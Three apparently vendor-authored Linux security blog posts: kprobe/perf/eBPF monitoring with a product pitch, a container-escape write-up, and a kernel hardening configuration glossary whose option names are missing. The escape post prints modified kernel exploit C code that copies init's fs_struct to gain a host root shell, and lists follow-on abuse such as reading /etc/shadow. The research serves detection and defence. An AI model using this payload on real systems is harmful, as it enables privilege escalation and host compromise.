But kernel modules aren’t the only way to collect data from the kernel. Linux provides tons of subsystems to help people collect data for performance and debugging. The Linux Kernel org specifically gave the community little mechanisms to use for visibility through the introduction of kprobes well over a decade ago. Basically, this was Linux saying, “Hey, we know you want to collect system data, so we’re going to make a standardized mechanism for you to do it.”

A kprobe is a means of saying, for a given function in the kernel, “I want to record when this function is called, and collect information such as the arguments it was passed.” The way it would be written on Linux using its special subsystem is like:

p:[name-for-probe-output] [function-you-want-to-probe] [what-will-it-collect]

For instance, it could be p:myexecprobe execve $ARG1, $ARG2. This would output the kprobe myexecprobe, which would include the programpath ($ARG1) and cmdline ($ARG2) when a user uses the execve syscall. You name your kprobe to tie any resulting output back to what you wanted to monitor. If you’re familiar with canarytokens, it’s similar to how you name a particular token, like MyPictures so when you receive the alert, you know the source of the alert is from your MyPictures folder.

how kprobes work for Linux monitoring

Most commonly, kprobes are placed on syscalls between specific processes (which run specific programs) and the kernel, as shown in the above diagram. There are also uprobes, which snoop on userspace functions instead of kernel functions, but they’re a topic for another time.

The output from kprobes is a super useful data source, but this output needs to be collected and analyzed. Unfortunately, most people still use a kernel module to handle the output from kprobes. This is still adding risk, which DevOps doesn’t (and shouldn’t) want. But, let’s continue to explore how they actually can be used more responsibly.

Ring Buffer

Ring buffers are also known as circular buffers. If you’re familiar with accounting, the ring buffer follows a FIFO approach. Or, you can think of it like an empty pizza pan where slices are added one by one and the next slice eaten is always the oldest slice added to the pan (because who wants to eat cold pizza?). Given the finite space within the ring buffer, when new data needs to be added, the oldest data will always be overwritten.

The reason why ring buffers are used rather than logging syscalls to disk space is because that would be expensive resource-wise and slow the system down. With the ring buffer, you ensure that the resource overhead is the pizza pan, rather than accumulating the equivalent of a ball pit full of pizza in your room.

I’ll be talking here about ring buffers for kprobes specifically. The first “block” (think: open space for that first slice of pizza on the pan) is the one that keeps track of the rest of the pan. This block will tell you where to begin reading and where to end reading based on what you’ve already read — that way you’re never missing anything.

So, what data is actually in these kprobe ring buffers? Let’s go back to our prior example of a kprobe of: p:myexecprobe execve $ARG1, $ARG2. These last two parameters, $ARG1 and $ARG2, define what myexecprobe will write to the ring buffer. In the case of execve, it might be the programpath and cmdline values. This is particularly helpful if you’re only looking to monitor specific sort of metadata for particular functions — that way you get exactly what you need (arguments, return values, etc.).

For monitoring, you need something fast so you catch any bad activity quickly. You want to copy things as little as possible for performance, and mmap, which is short for memory mapping, can help with that.

Think of using mmap like cutting out a middleperson. Let’s say there’s a factory that is bulk producing a variety of widgets that get packaged and shipped out. Rather than waiting to receive one of those packages, having to unpackage it, and then finally being able to see what the widget is, wouldn’t it save more time getting a window into the factory to see the widget? Mmap provides that sort of window, allowing you to specify the window of how many widgets you can see, saving you a lot of time.

To recap, kprobe ring buffers allow you to efficiently output the data you defined wanting from your kprobes, and mmap makes the process of accessing that data even more efficient.


About a decade ago, the Linux Kernel introduced a new mechanism to help extract data collected via sources like kprobes, called perf. As you might imagine, perf is short for performance, because its original use case was for performance analyzing for Linux. Perf collects the data from kprobes and puts it into the ring buffer. Let’s say Apache performs a syscall on which you have a kprobe; perf then says “Okay, collect this data based on the kprobe’s specifications, and we’ll write the data for you here in this buffer.”

The great news is that perf grants you access to kprobes, but in a much safer way than kernel modules. Using perf is extremely stable, in contrast to the instability and chaos of using kprobes from a kernel module. Simply put, by using perf, you’re a lot less likely to mess up anything up in the kernel. Really the biggest downside of perf is that it doesn’t backport well to ancient kernels — think the Linux equivalent of Windows XP. For more on how perf can be used, see Brendan Gregg’s excellent write-up.


BPFs (aka Berkeley Packet Filter) are essentially itty bitty programs. BPFs are written to take baby rules like source_ip = X.X.X.X and translate it into a tiny program. Because BPF is its own baby instruction set, it can only do simple things, like basic arithmetic. It can jump forwards, but not backwards, so no loops for these little ones. All access to data is validated to be safe by the kernel. These restrictions timebox BPF programs and ensure access to all resources are provably safe, meaning you can run custom BPF programs in the kernel without risking stability.

eBPF is extended BPF. eBPF is a means of loading tiny programs into the kernel to execute during certain events. For instance, you could set little programs to evaluate data you collected through your kprobe.

By far the biggest downside of BPF and eBPF is its backwards compatibility. The ability to attach eBPF to kprobes is only in kernels from the past five years — and, as most Ops people know, a good chunk of enterprises have kernels way older than that. Therefore, while it might be the method of the future, it lacks support for the reality of most organizations’ environments today.

For more about how all the aforementioned mechanisms work together, I highly recommend Julia Evans’ blog and infographic on Linux tracing.

ML, AI, & Unicorn Dust

In addition to using the drama queen kernel modules, some solutions will go really heavy-handed with machine learning and artificial intelligence in order to improve their monitoring and detection. Regrettably, despite the cool math, there’s a significant training period upfront and a lot of tuning required.

DevOps doesn’t want a heavy footprint, however — not on the network, and certainly not on the CPU. But for most of these AI and ML-driven solutions, the architecture generally doesn’t scale well. These solutions collect data points all the time and send them over the network, which makes the network really sad and tired. It’d be like UPS having to deliver all Christmas presents on one day — the streets would be clogged, front steps and hallways would be packed, and drivers would be absolutely miserable.

Looking for anomalous behavior across the entire syscall boundary can give a sense of whether an app is acting weird, but not really if it’s acting weird for a security reason. This means a lot of false positives, which is obviously a big thumbs down for SecOps.

Batch analysis is generally required for solutions heavy in machine learning or artificial intelligence, which also means real-time monitoring isn’t possible. Real-time, despite being an overused buzzword, actually does matter to SecOps, because it’s better to catch exploitation as it’s happening than reading your alerts only to find a compromise that’s already occured.

The reason why batch analysis isn’t real time is because the mountain of data must be collected, sent out over the network, analyzed for policy violations or anomalies, and then finally an alert will be generated after minutes or even hours. If you don’t put a lot of money into a machine collecting all the data in one place and performing analysis, it could take even longer. This kind of computing is super expensive — and businesses tend not to like expensive things, particularly for areas like security that are already perceived as “cost centers.”

Another issue for machine learning-led approaches is that the algorithms have to learn from training data. The problem is that in order for the algorithm to catch an attack, it needs to have seen it before to identify it — which is not a solid bet when relying on historical data for training. Machine learning can be useful at catching some basic stuff at scale, but it will always be linked to the past, and worse at catching novel or sneakier exploitation.

The Capsule8 Way

This is where I show us off a bit — you are more than welcome to skip to the conclusion, but you’ll miss out on some pretty awesome stuff! We’ve put a lot of thought into our product by thinking about what would make us most mad as hackers if we encountered it while attacking an organization.

One difference between Capsule8 and other Linux detection solutions is that our detection happens locally. It’s far less expensive for everyone to do computations locally vs. sending off the machine via the network, and we like avoiding unnecessary pain. We also make Capsule8’s resource cost tunable, so you can set how much CPU time goes towards Capsule8 doing its thing.

How you configure Capsule8 depends on your risk tolerance and your preference. This is how we’ve gotten the thumbs up from Ops, even at large enterprises. But what’s extra cool about Capsule8 is that we use kprobes + perf in an intelligent way, driven by our extensive experience breaking into systems.

Think of it like this: if you want to know whether someone broke into your apartment, there are a few strategies you could create. The most obvious ones would be catching the window breaking, the doors being bashed in, or the safe with the jewels opening. This is where our exploitation expertise comes in handy (more on that below) because we look at what attackers must do to complete an attack.

We maintain multiple vantage points, with an eye to the attacker’s “kill chain” — like looking at the front door, window, stairs, and closet door to the safe. You could also create a policy like: normally you hear the front door open before the window opens, so if you hear the window open before the front door, that’s weird. Think of this as the “check the context around the window opening” strategy.

Most ML, AI, and other mathematically-magical solutions are more like: “Let’s spend some time counting all the times the doors opened, and then send alerts on anything that deviates from this baseline we established.” Some go to an extreme and perform analysis that sounds cool, akin to asking, “Are the bricks moving? We should analyze the atomic states of the bricks in the building, maybe we should look at the chemical composition of the glass, too.”

For too many of these ML and AI-based solutions, they not only ignore how attackers actually behave, but also end up wasting a lot of network traffic and compute time. No one wants their time wasted, and the organization certainly doesn’t want its resources wasted.

At Capsule8, we also want to make attackers sad — hopefully crushing their souls. Ideally, you want to pinpoint exactly which points are interesting to attackers in the kernel and watch those closely. This is where a deep bench of exploitation experience (like our Capsule8 Labs team) comes in handy. That way, you know which places in the kernel are most loved by attackers, and can collect data that matters rather than collecting all the things.

For example, attackers love popping shells. But developers and programs love using bash or bin shells, too — it’s just a handy tool that everything uses. Most solutions will create a rule like, “show me anytime a shell runs,” which is going to be all the time.

This sort of rule becomes functionally useless unless you absolutely love sifting through the same alert over and over. Capsule8 instead can determine the difference between a user or a program using it, and answer questions like, “Is this shell executing to routinely process a script, or is it interacting with a live user?”

Capsule8’s approach means we can detect the entire spectrum of unwanted behavior on Linux, from devs risking production stability to sexy kernel exploitation by motivated attackers. This includes real zero-days — not zero-days as in “a slightly modified malware strain,” but the top-shelf expensive stuff that is exploiting the system in a way you can’t patch.

If you want a cool recent example, check out our Part 1 and Part 2 of how we exploited systemd (the first public exploit, I might add). The best part is, our stack pivot detection catches it — and that’s just one of the many detections we have in place. So it’s not about finding CVEs or anomalous behavior, it’s about finding the exact techniques attackers must use to compromise the system.


IT Ops, DevOps, InfraOps, and other *Ops people hate kernel modules because they:

  • Create instability
  • Invalidate support contracts
  • Require re-compiling kernel updates with the module
  • For real, they require compilers on prod instances :scream:
  • Make you wait to rebuild the kernel if there’s a critical vuln
  • Totally break the build chain people use
  • (but at least it isn’t AuditD?)

A kprobe + perf approach is the safer way to perform Linux monitoring, even for ancient systems that are probably covered in moss like Ancient Guardians in Zelda at this point — but still happily running along despite their age. Keep an eye out on BPF and eBPF, but keep in mind that until the vast majority of enterprises move beyond those ancient kernels, they aren’t for widespread usage.

Ultimately, if you don’t want to make DevOps miserable, you need Linux monitoring that:

  • Can’t crash the kernel
  • Won’t flood the network
  • Won’t require extra labor by Ops
  • Fits into the existing build chain
  • No, seriously, it really can’t disrupt prod

If you’re SecOps or DevSecOps, you’ll probably be happy if:

  • Real attacks are detected
  • Even better, real attacks are prevented
  • You aren’t spammed with alerts
  • Your time isn’t wasted with false positives
  • You aren’t drowning in a data swamp
  • You can control analysis costs
  • Ops isn’t telling you your monitoring idea is bad, and that you should feel bad

Obviously, this is Capsule8’s mission — for security and operations to live in harmony, while making attackers mad that they can’t compromise your production Linux systems.

An Exercise in Practical Container Escapology

Posted by

You Think That’s Air You’re Breathing?


Containerization has revolutionized how software is developed and deployed, by providing powerful specificity and control for devs and ops alike. By isolating software environments and interactions, containers categorically eliminate a variety of problems which have historically plagued the software development process, such as dependency conflicts and name collisions. Containers also provide some security properties, including version management, an expression of intent, and often reduced attack surface. However, it is important to understand that although the organizational isolation of containers is what enables these security properties, isolation itself is not a security property of containers.

As the use of containers in production Linux environments continues to increase, so does the interest in how the technology responsible for containers can be used and abused to break free from the confines of a container. Recently there was a fair amount of hype surrounding the vulnerability in runc, and for good reason: getting out of the container gives the attacker much broader access to a host, enabling interaction with other containers, and the ability to view and modify configurations. But what seemed lost in this hype is that the ability to escape containers is not confined to a one-off vulnerability in container management programs or orchestrators.

Simply put, containers are just processes, and as such they are governed by the kernel like any other process. Thus any kernel-land vulnerability which yields arbitrary code execution can be exploited to escape a container. To demonstrate this, Capsule8 Labs has created an exploit that removes the process from its confines and gives it root access in the Real World. Let’s take a look at what was involved.


Like most (but not all!) privilege escalation exploits that target Linux, the first thing we need is a kernel vulnerability. These are found and patched on a regular basis, and from time to time, a proof of concept exploit is released that demonstrates the impact of the issue. For the purposes of this post, we are going to use a combination of two vulnerabilities that were discovered and exploited by Andrey Konovalov, a Googler who regularly shares vulnerabilities he finds, along with exploit code. Thanks, Andrey! We use the first vulnerability as our ASLR bypass, as the method included in the second PoC exploit is unreliable if the target system has a high uptime.

We selected these two vulnerabilities as an example of a scenario where SMEP/SMAP can be disabled, and subsequently the kernel can be made to execute user-controlled code from a userland process (which is effectively like having shellcode that can be written in C). A full write-up on the mechanism used by these exploits to get us to this point of the kernel executing userland code is beyond the scope of this post. The purpose of this post is to describe how once any given kernel exploit reaches this point, a payload can be applied to escape a container.

Relevant Structures

In reality, very little separates a process from being in or out of a container. Furthermore, you don’t need to play with namespaces in order to escape the container’s confines and interact with the host. It can come down to as little as interacting with the following data structures:


This struct is the guts of a process in the kernel, and it holds a few things we care about:

  • pid number of the task, which in kernel-land is better thought of as a user-land thread ID
  • real_parent: a pointer to the task_struct of the parent task. We loop over this pointer and interrogate the parent’s pid in order to find find PID 1 – the PID belonging to init.
  • fs_struct: a pointer to a structure describing the filesystem where task is operating


This defines the root directory and present working directory for the task. We can copy this over from another process that is not in a container in order to have our task point at a directory in the host file system. By copying init‘s fs_struct, we can be sure to land in the root directory of the host. To do this, we call the copy_fs_struct kernel function, as it appropriately handles the accounting work of locking and updating the reference count to the underlying members of the fs_struct.

Breaking out

When it comes to actually breaking out, a few things need to happen. We need to:

  1. Escalate to root – Set the credentials of our task to that of root – ensuring we are actually root once we break out.
  2. Find init – Find the task_struct for PID 1, the init process – we want to copy a lot of its data to our own task.
  3. Copy filesystem info – Copy the fs_struct information from init‘s structs to ours
  4. Execute a root shell – Execute /bin/bash to drop us into a root shell.

Of the four steps above, 2 and 3 are specific to our container escape exploit. The crux of our changes are shown below, highlighted in blue and red. We have added one function named get_task(), which gets the value of current (a pointer to our task’s task_struct). The code in black was in the original exploit, available here.

typedef unsigned long __attribute__((regparm(3))) (*_copy_fs_struct)(unsigned long init_task);

uint64_t get_task(void) {
    uint64_t task;
    asm volatile ("movq %%gs: 0xD380, %0":"=r"(task));
    return task;

void get_root(void) {

    int i;
    char *task;
    char *init;
    uint32_t pid = 0;


    task = (char *)get_task();
    init = task;
    while (pid != 1) {
        init = *(char **)(init + TASK_REAL_PARENT_OFFSET);
        pid = *(uint32_t *)(init + TASK_PID_OFFSET);

    *(uint64_t *)(task + TASK_FS_OFFSET) = ((_copy_fs_struct)(COPY_FS_STRUCT))(*(long unsigned int *)(init + TASK_FS_OFFSET));

Secondly, we altered the get_root() function already present in Andrey’s POC for CVE-2017-1000112. There are two main changes here:

  • We traverse up the process’ lineage through the real_parent pointer in the task_struct to find the task_struct of init (PID 1)
  • We copy init‘s fs_struct to our task to ensure our new shell has access to the host filesystem.

It’s worth noting that the kernel functions prepare_kernel_cred and commit_creds that are used by the exploit to get root credentials will also end up specifying our task’s user-namespace to be that of the host, however this isn’t actually a change in Docker containers, as by default Docker containers run in the host’s user-namespace.

Full code to modified exploit to escape the container is available here. Check out the exploit in action below!

In the video, we can see that inside the container as the ubuntu user, we have a limited view of processes, and indeed the /proc directory is owned by nobody/nogroup – and indication that we are in an unprivileged container. After running the exploit, our prompt still shows us as being inside the ubuntu_lxc_usr container, however we now have access to the overall host’s file system – we can list processes from outside our container and read the /etc/shadow file, which contains entries from the host and not the container. From this point, there’s no necessity to even bother with changing namespaces, you have free rein to:

  • Write or overwrite host or other container files (including kubelet configs)
  • Interact with Docker (perhaps pull and launch a new fun privileged container)
  • Inject code or harvest data from processes (host or container) via /proc/pid/mem
  • Load / unload kernel modules

Our exploit has been tested against Ubuntu kernel 4.8.0-34-generic, with containers running in Kubernetes with Docker, and unprivileged containers in a local LXC deployment. Note that you will need to find your own function and struct offsets if you’re trying this for a different kernel version.


The rules governing containers are the same as any other process: some can be bent, and others can be broken. Vulnerabilities and misconfigurations in container-management programs are not the only means by which an attacker can escape a container. And while the security properties of containers should be celebrated, the isolation of container processes should not be treated as a security boundary. This is why it is important to have detection of kernel exploitation in your strategy for defense. Capsule8 provides exploitation detection out-of-the-box, identifying container-escapes and other kernel malfeasance.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

Kernel Configuration Glossary

Posted by

In our post “Millions of Binaries Later: a Look Into Linux Hardening in the Wild”, we examined the security properties of different distributions. In the following, we provide a glossary for the security-relevant kernel configuration options discussed in that post (scraped from the Linux Kernel Driver Database).





Supervisor Mode Access Prevention (SMAP) is a security feature in newer Intel processors. There is a small performance cost if this enabled and turned on; there is also a small increase in the kernel size if this is enabled.



If this is set kernel text and rodata memory will be made read-only and non-text memory will be made non-executable. This provides protection against certain security exploits (e.g. executing the heap or modifying text)



In support of Kernel Address Space Layout Randomization (KASLR) this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.



Randomizes the base virtual address of kernel memory sections (physical memory mapping vmalloc & vmemmap). This security feature makes exploits relying on predictable memory locations less reliable.



Functions will have the stack-protector canary logic added in any of the following conditions:



This option checks for obviously wrong memory regions when copying memory to/from the kernel (via copy_to_user() and copy_from_user() functions) by rejecting memory ranges that are larger than the specified heap object span multiple separately allocated pages are not on the process stack or are part of the kernel text. This kills entire classes of heap overflow exploits and similar kernel memory exposures.





If this is set module text and rodata memory will be made read-only and non-text memory will be made non-executable. This provides protection against certain security exploits (e.g. writing to text)



This allows you to choose different security modules to be configured into your kernel.



This kernel feature is useful for number crunching applications that may need to compute untrusted bytecode during their execution. By using pipes or other transports made available to the process as file descriptors supporting the read/write syscalls it's possible to isolate those applications in their own address space using seccomp. Once seccomp is enabled via prctl(PR_SET_SECCOMP) it cannot be disabled and the task is only allowed to execute a few safe syscalls defined by each seccomp mode.



If this option is disabled you allow userspace (root) access to all of memory including kernel and userspace memory. Accidental access to this is obviously disastrous but specific access can be used by people debugging the kernel.



Say Y here if you want to support the /dev/kmem device. The /dev/kmem device is rarely used but can be used for certain kind of kernel debugging operations. When in doubt say "N".



The User Mode Instruction Prevention (UMIP) is a security feature in newer Intel processors. If enabled a general protection fault is issued if the SGDT SLDT SIDT SMSW or STR instructions are executed in user mode. These instructions unnecessarily expose information about the hardware state.



Enable this if you want the use virtually-mapped kernel stacks with guard pages. This causes kernel stack overflows to be caught immediately rather than causing difficult-to-diagnose corruption.



Many kernel heap attacks try to target slab cache metadata and other infrastructure. This options makes minor performance sacrifies to harden the kernel slab allocator against common freelist exploit methods.



Randomizes the freelist order used on creating new pages. This security feature reduces the predictability of the kernel slab allocator against heap overflows.



Detect overflows of buffers in common string and memory functions where the compiler can determine and validate the buffer sizes.



Select this option if the kernel should BUG when it encounters data corruption in kernel memory structures when they get checked for validity.



This is a temporary option that allows missing usercopy whitelists to be discovered via a WARN() to the kernel log instead of rejecting the copy falling back to non-whitelisted hardened usercopy that checks the slab allocation size instead of the whitelist size. This option will be removed once it seems like all missing usercopy whitelists have been identified and fixed. Booting with "slab_common.usercopy_fallback=Y/N" can change this setting.



This enforces restrictions on unprivileged users reading the kernel syslog via dmesg(8).



This selects Yama which extends DAC support with additional system-wide security settings beyond regular Linux discretionary access controls. Currently available is ptrace scope restriction. Like capabilities this security module stacks with other LSMs. Further information can be found in Documentation/admin-guide/LSM/Yama.rst.



This option enables writing to a selinuxfs node 'disable' which allows SELinux to be disabled at runtime prior to the policy load. SELinux will then remain disabled until the next boot. This option is similar to the selinux=0 boot parameter but is to support runtime disabling of SELinux e.g. from /sbin/init for portability across platforms where boot parameters are difficult to employ.



Enable tasks to build secure computing environments defined in terms of Berkeley Packet Filter programs which implement task-defined system call filtering polices.



This debug facility allows ACPI AML methods to be inserted and/or replaced without rebooting the system. For details refer to: Documentation/acpi/method-customizing.txt.



Randomizing heap placement makes heap exploits harder but it also breaks ancient binaries (including anything libc5 based). This option changes the bootup default to heap randomization disabled and can be overridden at runtime by setting /proc/sys/kernel/randomize_va_space to 2.



If this option is disabled you allow userspace (root) access to all io-memory regardless of whether a driver is actively using that range. Accidental access to this is obviously disastrous but specific access can be used by people debugging kernel drivers.



There will be no vsyscall mapping at all. This will eliminate any risk of ASLR bypass due to the vsyscall fixed address mapping. Attempts to use the vsyscalls will be reported to dmesg so that either old or malicious userspace programs can be identified.



Enable the userfaultfd() system call that allows to intercept and handle page faults in userland.



Say Y here if you want to support kernel live patching. This option has no runtime impact until a kernel "patch" module uses the interface provided by this option to register a patch causing calls to patched functions to be redirected to new function code contained in the patch module.



Berkeley Packet Filter filtering capabilities are normally handled by an interpreter. This option allows kernel to generate a native code when filter is loaded in memory. This should speedup packet sniffing (libpcap/tcpdump).



This feature reduces the number of hardware side channels by ensuring that the majority of kernel addresses are not mapped into userspace.



Compile kernel with the retpoline compiler options to guard against kernel-to-user data leaks by avoiding speculative indirect branches. Requires a compiler with -mindirect-branch=thunk-extern support for full protection. The kernel may run slower.



Port to the x86-64 architecture. x86-64 is a 64-bit extension to the classical 32-bit x86 architecture. For details see



Generate a warning if any W+X mappings are found at boot.



This option checks for a stack overrun on calls to schedule(). If the stack end location is found to be over written always panic as the content of the corrupted region can no longer be trusted. This is to ensure no erroneous behaviour occurs which could result in data corruption or a sporadic crash at a later stage once the region is examined. The runtime overhead introduced is minimal.



Check modules for valid signatures upon load: the signature is simply appended to the module. For more information see Documentation/admin-guide/module-signing.rst.



Enabling this switches the refcounting infrastructure from a fast unchecked atomic_t implementation to a fully state checked implementation which can be (slightly) slower but provides protections against various use-after-free conditions that can be used in security flaw exploits.



By default the kernel can call many different userspace binary programs through the "usermode helper" kernel interface. Some of these binaries are statically defined either in the kernel code itself or as a kernel configuration option. However some of these are dynamically created at runtime or can be modified after the kernel has started up. To provide an additional layer of security route all of these calls through a single executable that can not have its name changed.



Map the VDSO to the predictable old-style address too. Say N here if you are running a sufficiently recent glibc version (2.3.3 or later) to remove the high-mapped VDSO mapping and to exclusively use the randomized VDSO.



If you say Y here it will be possible to plug wrapper-driven binary formats into the kernel. You will like this especially when you use programs that need an interpreter to run like Java Python .NET or Emacs-Lisp. It's also useful if you often run DOS executables under the Linux DOS emulator DOSEMU (read the DOSEMU-HOWTO available from Once you have registered such a binary class with the kernel you can start one of those programs simply by typing in its name at a shell prompt; Linux will automatically feed it to the correct interpreter.



Provides a virtual ELF core file of the live kernel. This can be read with gdb and other ELF tools. No modifications can be made using this mechanism.



Linux can allow user programs to install a per-process x86 Local Descriptor Table (LDT) using the modify_ldt(2) system call. This is required to run 16-bit or segmented code such as DOSEMU or some Wine programs. It is also used by some very old threading libraries.



Kprobes allows you to trap at almost any kernel address and execute a callback function. register_kprobe() establishes a probepoint and specifies the callback. Kprobes is useful for kernel debugging non-intrusive instrumentation and testing. If in doubt say "N".



Uprobes is the user-space counterpart to kprobes: they enable instrumentation applications (such as 'perf probe') to establish unintrusive probes in user-space binaries and libraries by executing handler functions when the probes are hit by user-space applications.



debugfs is a virtual file system that kernel developers use to put debugging files into. Enable this option to be able to read and write to these files.



Enable the bpf() system call that allows to manipulate eBPF programs and maps via file descriptors.



Support user namespaces. This allows containers i.e. vservers to use user namespaces to provide different user info for different servers. If unsure say N.



Enable the kernel to trace every kernel function. This is done by using a compiler feature to insert a small 5-byte No-Operation instruction to the beginning of every kernel function which NOP sequence is then dynamically patched into a tracer call when tracing is enabled by the administrator. If it's runtime disabled (the bootup default) then the overhead of the instructions is very small and not measurable even in micro-benchmarks.



This value can be used to select the number of bits to use to determine the random offset to the base address of vma regions resulting from mmap allocations. This value will be bounded by the architecture's minimum and maximum supported values.



Disabling this option eliminates support for BUG and WARN reducing the size of your kernel image and potentially quietly ignoring numerous fatal conditions. You should only consider disabling this option for embedded systems with no facilities for reporting errors. Just say Y.



Select this to move thread_info off the stack into task_struct. To make this work an arch will need to remove all thread_info fields except flags and fix any runtime bugs.



Sign all modules during make modules_install. Without this option modules must be signed manually using the scripts/sign-file tool.



Fill the pages with poison patterns after free_pages() and verify the patterns before alloc_pages. The filling of the memory helps reduce the risk of information leaks from freed data. This does have a potential performance impact if enabled with the "page_poison=1" kernel boot option.



If you say Y here the layouts of structures that are entirely function pointers (and have not been manually annotated with __no_randomize_layout) or structures that have been explicitly marked with __randomize_layout will be randomized at compile-time. This can introduce the requirement of an additional information exposure vulnerability for exploits targeting these structure types.



Enable the suspend to disk (STD) functionality which is usually called "hibernation" in user interfaces. STD checkpoints the system and powers it off; and restores that checkpoint on reboot.



Exports the dump image of crashed kernel in ELF format.





SLUB has extensive debug support features. Disabling these can result in significant savings in code size. This also disables SLUB sysfs support. /sys/slab will not exist and there will be no support for cache validation etc.



Normal TCP/IP networking is open to an attack known as "SYN flooding". This denial-of-service attack prevents legitimate remote users from being able to connect to your computer during an ongoing attack and requires very little work from the attacker who can operate from anywhere on the Internet.



This is the portion of low virtual memory which should be protected from userspace allocation. Keeping a user from writing to low pages can help reduce the impact of kernel NULL pointer bugs.



By saying Y here the kernel will instrument some kernel code to extract some entropy from both original and artificially created program state. This will help especially embedded systems where there is little 'natural' source of entropy normally. The cost is some slowdown of the boot process (about 0.5%) and fork and irq processing.



Enable this to turn on extended checks in the linked-list walking routines.



Enable this to turn on some debug checking for credential management. The additional code keeps track of the number of pointers from task_structs to any given cred struct and checks to see that this number never exceeds the usage count of the cred struct.



Reject unsigned modules or signed modules for which we don't have a key. Without this such modules will simply taint the kernel.





Any files read through the kernel file reading interface (kernel modules firmware kexec images security policy) can be pinned to the first filesystem used for loading. When enabled any files that come from other filesystems will be rejected. This is best used on systems without an initrd that have a root filesystem backed by a read-only device such as dm-verity or a CDROM.



Skip the sanity checking on alloc only fill the pages with poison on free. This reduces some of the overhead of the poisoning feature.



Instead of using the existing poison value fill the pages with zeros. This makes it harder to detect when errors are occurring due to sanitization but the zeroing at free means that it is no longer necessary to write zeros when GFP_ZERO is used on allocation.



For reduced kernel memory fragmentation slab caches can be merged when they share the same size and other characteristics. This carries a risk of kernel heap overflows being able to overwrite objects from merged caches (and more easily control cache layout) which makes such heap attacks easier to exploit by attackers. By keeping caches unmerged these kinds of exploits can usually only damage objects in the same cache. To disable merging at runtime "slab_nomerge" can be passed on the kernel command line.



Say Y here if you want to show the kernel pagetable layout in a debugfs file. This information is only useful for kernel developers who are working in architecture specific areas of the kernel. It is probably not a good idea to enable this feature in a production kernel. If in doubt say "N"



Say Y here if you want to enable the memory leak detector. The memory allocation/freeing is traced in a way similar to the Boehm's conservative garbage collector the difference being that the orphan objects are not freed but only shown in /sys/kernel/debug/kmemleak. Enabling this feature will introduce an overhead to memory allocations. See Documentation/dev-tools/kmemleak.rst for more details.



kexec is a system call that implements the ability to shutdown your current kernel and to start another kernel. It is like a reboot but it is independent of the system firmware. And like a reboot you can start any kernel with it not just Linux.



A pseudo terminal (PTY) is a software device consisting of two halves: a master and a slave. The slave device behaves identical to a physical terminal; the master device is used by a process to read data from and write data to the slave thereby emulating a terminal. Typical programs for the master side are telnet servers and xterms.



Include code to run legacy 32-bit programs under a 64-bit kernel. You should likely turn this on unless you're 100% sure that you don't have any 32-bit programs left.



Various /proc files exist to monitor process memory utilization: /proc/pid/smaps /proc/pid/clear_refs /proc/pid/pagemap /proc/kpagecount and /proc/kpageflags. Disabling these interfaces will reduce the size of the kernel by approximately 4kb.



This plugin zero-initializes any structures containing a __user attribute. This can prevent some classes of information exposures.



Zero initialize any struct type local variable that may be passed by reference without having been initialized.



Enable this to turn on checks on scatter-gather tables. This can help find problems with drivers that do not properly initialize their sg tables.



Boot with debugging on by default. SLUB boots by default with the runtime debug capabilities switched off. Enabling this is equivalent to specifying the "slub_debug" parameter on boot. There is no support for more fine grained debug control like possible with slub_debug=xxx. SLUB debugging may be switched off in a kernel built with SLUB_DEBUG_ON by specifying "slub_debug=-".



Support for INET (TCP DCCP etc) socket monitoring interface used by native Linux tools such as ss. ss is included in iproute2 currently downloadable at:



Include code to run binaries for the x32 native 32-bit ABI for 64-bit processors. An x32 process gets access to the full 64-bit register file and wide data path while leaving pointers at 32 bits for smaller memory footprint.



This option enables the uselib syscall a system call used in the dynamic linker from libc5 and earlier. glibc does not use this system call. If you intend to run programs built on libc5 or earlier you may need to enable this syscall. Current systems running glibc can safely disable this.



Enables additional kernel features in a sake of checkpoint/restore. In particular it adds auxiliary prctl codes to setup process text data and heap segment sizes and a few additional /proc filesystem entries.



This option enables memory changes tracking by introducing a soft-dirty bit on pte-s. This bit it set when someone writes into a page just as regular dirty bit but unlike the latter it can be cleared by hands.



Mmiotrace traces Memory Mapped I/O access and is meant for debugging and reverse engineering. It is called from the ioremap implementation and works via page faults. Tracing is disabled by default and can be enabled at run-time.



This is new version of kexec system call. This system call is file based and takes file descriptors as system call argument for kernel and initramfs as opposed to list of segments as accepted by previous system call.



Enable this to turn on sanity checking for notifier call chains. This is most useful for kernel developers to make sure that modules properly unregister themselves from notifier chains. This is a relatively cheap check but if you care about maximum performance say N.



This option enables code in the zsmalloc to collect various statistics about whats happening in zsmalloc and exports that information to userspace via debugfs. If unsure say N.



This keeps track of what call chain is the owner of a page may help to find bare alloc_page(s) leaks. Even if you include this feature on your build it is disabled in default. You should pass "page_owner=on" to boot parameter in order to enable it. Eats a fair amount of memory if enabled. See tools/vm/page_owner_sort.c for user-space helper.



A.out (Assembler.OUTput) is a set of formats for libraries and executables used in the earliest versions of UNIX. Linux used the a.out formats QMAGIC and ZMAGIC until they were replaced with the ELF format.



Datagram Congestion Control Protocol (RFC 4340)



Stream Control Transmission Protocol



Say Y here if you want to support the /dev/port device. The /dev/port device is similar to /dev/mem but for I/O ports.



This option provides the ability to inject artificial errors to specified notifier chain callbacks. It is useful to test the error handling of notifier call chain failures.



This option provides functionality to upgrade arbitrary ACPI tables via initrd. No functional change if no ACPI tables are passed via initrd therefore it's safe to say Y. See Documentation/acpi/initrd_table_override.txt for details



EINJ provides a hardware error injection mechanism it is mainly used for debugging and testing the other parts of APEI and some other RAS features.



Say Y here to enable the extended profiling support mechanisms used by profilers such as OProfile.



GCC plugins are loadable modules that provide extra features to the compiler. They are useful for runtime instrumentation and static analysis.



This is a dumb module for testing mmiotrace. It is very dangerous as it will write garbage to IO memory starting at a given address. However it should be safe to use on e.g. unused portion of VRAM.